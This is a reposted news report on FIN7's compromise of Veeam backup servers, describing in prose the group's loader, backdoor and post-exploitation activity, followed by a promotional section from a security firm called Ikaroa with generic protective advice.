Back

Cybercrime group FIN7 targets Veeam backup servers

Researchers warn that a financially motivated cybercrime group known as FIN7 is compromising Veeam Backup & Replication servers and deploying malware on them. It’s not yet clear how the attackers are getting into the servers, but it’s possible they’re taking advantage of a vulnerability patched in the popular enterprise data replication solution last month.

Researchers at cybersecurity firm WithSecure have so far investigated two of those compromises, dating back to late March, but believe they are likely part of a larger campaign. Post-exploitation activity included persistence configuration, system and network reconnaissance, credential extraction, and lateral movement.

Tools and techniques used consistent with previous FIN7 activity

FIN7 or Carbon Spider is a cyber crime group that has been operating since at least 2013 and has been associated with the Carbanak malware family. The group was known in its early years for launching malware attacks against organizations in the retail, restaurant and hospitality industries with the goal of stealing credit card information. However, FIN7 also expanded into ransomware, associated with the Darkside and BlackMatter ransomware families and, more recently, BlackCat/ALPHV.

A forensic analysis of the compromised Veeam servers showed that the SQL Server process “sqlservr.exe” related to the Veeam backup instance was used to run a batch shell script, which in in turn downloaded and executed a PowerShell script directly in memory. This PowerShell script was POWERTRASH, an obfuscated malware loader that has been attributed to FIN7 in the past.

This PowerShell-based loader is designed to unpack embedded payloads and execute them on the system using a technique known as reflective PE injection. FIN7 was previously seen using this loader to deploy the Carbanak Trojan, the Cobalt Strike beacon, or a backdoor called DICELOADER or Lizar. The latter was also seen in recent attacks against Veeam servers, establishing another link to FIN7.

The DICELOADER backdoor allowed attackers to deploy additional custom PowerShell scripts and bash scripts. Some of the scripts used were identical to those used by FIN7 in other attacks.

Copyright © 2023 IDG Communications, Inc.

Source link
.

Ikaroa is keeping a close eye on the latest cybercrime trends, particularly this one, where a hacking group termed FIN7 has been targeting Veeam backup servers. The FIN7 group is made up of advanced hackers who have been attacking small and large businesses around the world with massive success.

FIN7 exploits vulnerabilities in servers running Veeam to gain access to valuable information and deploy ransomware. Veeam is commonly used by organizations to back up critical data, and accessing their servers is often the first step for hackers preparing for a major attack.

As a safety precaution, Ikaroa advises all current and future clients to watch out for threats from FIN7. Keep a close eye on your servers, and make sure all the necessary security measures are in place. These include keeping your software up to date, using strong passwords, and restricting employee access.

Your IT team should also be vigilant when it comes to network security and access. Make sure that all your users are authorized and that potential weaknesses in user authentication are prevented. Additionally, ensure that employees and customers only use secure WiFi networks.

It can also be beneficial to use cloud storage to protect your data from cybercriminals. Cloud storage offers an extra layer of security, and it also makes data recovery easier in the event of an attack.

Finally, make sure that your company has a comprehensive and up-to-date security plan in place. At Ikaroa, we specialize in helping companies create comprehensive security plans that include risk assessments and regular audits.

By taking these steps to protect against FIN7, you can dramatically reduce the risk of a successful attack.

ikaroa
ikaroa
https://ikaroa.com

Leave a Reply

Your email address will not be published. Required fields are marked *